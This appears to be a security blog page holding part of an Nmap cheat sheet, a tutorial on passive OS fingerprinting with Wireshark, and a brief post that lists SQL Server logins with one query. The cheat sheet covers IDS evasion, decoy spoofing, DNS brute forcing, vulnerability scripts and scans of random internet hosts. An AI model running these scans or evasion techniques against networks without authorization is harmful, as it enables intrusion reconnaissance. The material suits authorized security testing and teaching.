Makes Nmap guess more aggressively

-O –max-os-tries

nmap 192.168.1.1 -O –max-os-tries 1

Set the maximum number x of OS
detection tries against a target

-A

nmap 192.168.1.1 -A

Enables OS detection, version detection, script scanning, and traceroute

Timing and Performance

Switch

Example

Description

-T0

nmap 192.168.1.1 -T0

Paranoid (0) Intrusion Detection
System evasion

-T1

nmap 192.168.1.1 -T1

Sneaky (1) Intrusion Detection System
evasion

-T2

nmap 192.168.1.1 -T2

Polite (2) slows down the scan to use
less bandwidth and use less target
machine resources

-T3

nmap 192.168.1.1 -T3

Normal (3) which is default speed

-T4

nmap 192.168.1.1 -T4

Aggressive (4) speeds scans; assumes
you are on a reasonably fast and
reliable network

-T5

nmap 192.168.1.1 -T5

Insane (5) speeds scan; assumes you
are on an extraordinarily fast network

Switch

Example input

Description

–host-timeout <time>

1s; 4m; 2h

Give up on target after this long

–min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>

1s; 4m; 2h

Specifies probe round trip time

–min-hostgroup/max-hostgroup <size<size>

50; 1024

Parallel host scan group
sizes

–min-parallelism/max-parallelism <numprobes>

10; 1

Probe parallelization

–scan-delay/–max-scan-delay <time>

20ms; 2s; 4m; 5h

Adjust delay between probes

–max-retries <tries>

3

Specify the maximum number
of port scan probe retransmissions

–min-rate <number>

100

Send packets no slower than <numberr> per second

–max-rate <number>

100

Send packets no faster than <number> per second

NSE Scripts

Switch

Example

Description

-sC

nmap 192.168.1.1 -sC

Scan with default NSE scripts. Considered useful for discovery and safe

–script default

nmap 192.168.1.1 –script default

Scan with default NSE scripts. Considered useful for discovery and safe

–script

nmap 192.168.1.1 –script=banner

Scan with a single script. Example banner

–script

nmap 192.168.1.1 –script=http*

Scan with a wildcard. Example http

–script

nmap 192.168.1.1 –script=http,banner

Scan with two scripts. Example http and banner

–script

nmap 192.168.1.1 –script “not intrusive”

Scan default, but remove intrusive scripts

–script-args

nmap –script snmp-sysdescr –script-args snmpcommunity=admin 192.168.1.1

NSE script with arguments

Useful NSE Script Examples

Command

Description

nmap -Pn –script=http-sitemap-generator scanme.nmap.org

http site map generator

nmap -n -Pn -p 80 –open -sV -vvv –script banner,http-title -iR 1000

Fast search for random web servers

nmap -Pn –script=dns-brute domain.com

Brute forces DNS hostnames guessing subdomains

nmap -n -Pn -vv -O -sV –script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1

Safe SMB scripts to run

nmap –script whois* domain.com

Whois query

nmap -p80 –script http-unsafe-output-escaping scanme.nmap.org

Detect cross site scripting vulnerabilities

nmap -p80 –script http-sql-injection scanme.nmap.org

Check for SQL injections

Firewall / IDS Evasion and Spoofing

Switch

Example

Description

-f

nmap 192.168.1.1 -f

Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters

–mtu

nmap 192.168.1.1 –mtu 32

Set your own offset size

-D

nmap -D 192.168.1.101,192.168.1.102,
192.168.1.103,192.168.1.23 192.168.1.1

Send scans from spoofed IPs

-D

nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip

Above example explained

-S

Scan Facebook from Microsoft (-e eth0 -Pn may be required)

-g

nmap -g 53 192.168.1.1

Use given source port number

–proxies

nmap –proxies http://192.168.1.1:8080, http://192.168.1.2:8080 192.168.1.1

Relay connections through HTTP/SOCKS4 proxies

–data-length

nmap –data-length 200 192.168.1.1

Appends random data to sent packets

Example IDS Evasion command

nmap -f -t 0 -n -Pn –data-length 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1

Output

Switch

Example

Description

-oN

nmap 192.168.1.1 -oN normal.file

Normal output to the file normal.file

-oX

nmap 192.168.1.1 -oX xml.file

XML output to the file xml.file

-oG

nmap 192.168.1.1 -oG grep.file

Grepable output to the file grep.file

-oA

nmap 192.168.1.1 -oA results

Output in the three major formats at once

-oG –

nmap 192.168.1.1 -oG –

Grepable output to screen. -oN -, -oX – also usable

–append-output

nmap 192.168.1.1 -oN file.file –append-output

Append a scan to a previous scan file

-v

nmap 192.168.1.1 -v

Increase the verbosity level (use -vv or more for greater effect)

-d

nmap 192.168.1.1 -d

Increase debugging level (use -dd or more for greater effect)

–reason

nmap 192.168.1.1 –reason

Display the reason a port is in a particular state, same output as -vv

–open

nmap 192.168.1.1 –open

Only show open (or possibly open) ports

–packet-trace

nmap 192.168.1.1 -T4 –packet-trace

Show all packets sent and received

–iflist

nmap –iflist

Shows the host interfaces and routes

–resume

nmap –resume results.file

Resume a scan

Helpful Nmap Output examples

Command

Description

nmap -p80 -sV -oG – –open 192.168.1.1/24 | grep open

Scan for web servers and grep to show which IPs are running web servers

nmap -iR 10 -n -oX out.xml | grep “Nmap” | cut -d ” ” -f5 > live-hosts.txt

Generate a list of the IPs of live hosts

nmap -iR 10 -n -oX out2.xml | grep “Nmap” | cut -d ” ” -f5 >> live-hosts.txt

Append IP to the list of live hosts

ndiff scanl.xml scan2.xml

Compare output from nmap using the ndif

xsltproc nmap.xml -o nmap.html

Convert nmap xml files to html files

grep ” open ” results.nmap | sed -r ‘s/ +/ /g’ | sort | uniq -c | sort -rn | less

Reverse sorted list of how often ports turn up

Miscellaneous Options

Switch

Example

Description

-6

nmap -6 2607:f0d0:1002:51::4

Enable IPv6 scanning

-h

nmap -h

nmap help screen

Other Useful Nmap Commands

Command

Description

nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn

Discovery only on ports x, no port scan

nmap 192.168.1.1-1/24 -PR -sn -vv

Arp discovery only on local network, no port scan

nmap -iR 10 -sn -traceroute

Traceroute to random targets, no port scan

nmap 192.168.1.1-50 -sL –dns-server 192.168.1.1

Query the Internal DNS for hosts, list targets only

Posted in Security

OS Fingerprinting using Wireshark

Passive OS Fingerprinting

Passive OS fingerprinting is the examination of a passively collected sample of packets from a host in order to determine its operating system platform. It is called passive because it doesn’t involve communicating with the host being examined. This technique is preferred by those on the defensive side of the fence because those individuals are typically viewing hosts from the perspective of a network intrusion detection system or a firewall. This will typically mean that there is some level of access to capture packets generated by the host in order to perform the examination of that data.

Comparing Hosts

Given a passive collection scenario, let’s examine two individual packets collected from two separate hosts.

 


Figure 1: Packet from Host A


Figure 2: Packet from Host B

Before we begin looking at the differences in these packets, let’s go ahead and see what they have in common. First, we can easily determine that both hosts are sending a TCP packet to another host. The TCP packet has only the SYN flag set, so this should be the first packet in a sequence of communication. Both hosts are sending their packets to the destination port 80, so we will assume that this is attempted communication with a web server.

Now we can start to look at a couple of things that differ between the two packets. The first thing that jumps out to most people is that Host A mentions having an invalid checksum. In this case, that is actually normal based upon the test environment the packet was captured in, so that can be ignored. Beyond that, we can discern a couple of interest variances. Let’s step through these differences and then we will try and draw some conclusions about the host that sent each packet.

Time to Live

The first variance in the two packets is the Time to Live (TTL) value. We’ve discussed that the RFC documentation defines the TTL field as a means to define the maximum time a packet can remain in transit on a network until it is discarded. The RFC doesn’t define a default value, and as such, different operating systems use different default values. In this case, we can note that packet A uses a TTL of 128, and packet B uses a TTL of 64. Remember that these packets were captured directly from the transmitting source. If you were capturing these packets from the perspective of the recipient, you would see varying numbers depending on how many router hops are in between the source and destination. For instance, instead of a TTL of 128, you may see a value of 116. Generally, it’s safe to assume that if you see a number close to 128 or 64, then the default TTL was most likely one of these two.

Length

I mentioned earlier that these two packets are performing the exact same function. That might lead you to assume that they would be the exact same size, but that’s not the case. Packet A reports its length as 52 bytes, whereas packet B reports a length of 60 bytes. That means that the source host transmitting packet B added an additional 8 bytes to its SYN packet.

The source of these extra bytes can be found in the TCP header portion of the packet. The TCP header is variable length. This means that according to specification, each and every packet containing a TCP header must include a certain number of required fields, but may optionally include a few other fields if they are needed. These additional fields are referred to as TCP Options.

In packet A, there are three TCP options set. These are the Maximum Segment Size, Window Scale, and TCP SACK Permitted options. There are also a few bytes of padding that make up a total of 12 bytes of TCP options.


Figure 3: TCP Header of Packet A

In packet B, we have those same options, with the addition of the Timestamp option (which also replaces a few of the padding bytes we see in packet A).


Figure 4: TCP Header of Packet B

The timestamp option accounts for the additional 8 bytes of data in the packet sent from Host B. Both packets still perform the same function, the packet from host B just provides a bit more information about the host that created and transmitted it.

Making a Determination

Now that we’ve pointed out a few differences between the packets, we can try and determine the source operating system of each machine. In an effort to narrow things down about, I will go ahead and tell you that one is a Windows device and the other is a Linux device. In order to determine which packet belongs with which OS, you can either deploy both operating systems in a test environment and do the research yourself, or look at a chart that someone has already prepared for you.

ttl-values
Figure 5: A brief OS fingerprinting chart

The chart above is a very brief version of a more detailed chart put out by the SANS Institute. Based on this chart, we can determine that Host A is a Windows device, and Host B is a Linux device.

With all of that said, it’s important to mention that passive fingerprinting isn’t always an exact science. We tend to group these values into their respective operating system family (Windows, Linux, etc), when in reality, a Fedora Linux device may produce a different packet size by default than a SuSe Linux device. In addition, a lot of these values are configurable whether it is by modifying a configuration file or the system registry. This means that although a Windows device may typically have a certain TCP Receive Window size by default, a simple registry modification could chance this behavior and fool our attempts at fingerprinting the OS.

Overall, there are all sorts of weird protocol quirks and default values of particular fields that can be used to passively fingerprint a system with packets alone. With this knowledge, you should be able to do a little bit of experimentation yourself to see what variances you can find between systems.

Wrapping Up

In this article, we’ve discussed passive OS fingerprinting and gone through an example where we’ve compared to similar packets sent from devices using different operating systems. In the next article in this series, we will talk about active OS fingerprinting and how the responses networked devices give to certain types of packets can help us clue in on their running operating system.

Posted in Security

Sql Server exploit

There is a command in SQL Server that enable us to extract user login details from database:

select * from  sys.server_principals where type = ‘U’;

Possible values for Principal type:

S = SQL login

U = Windows login

G = Windows group

R = Server role

C = Login mapped to a certificate

K = Login mapped to an asymmetric key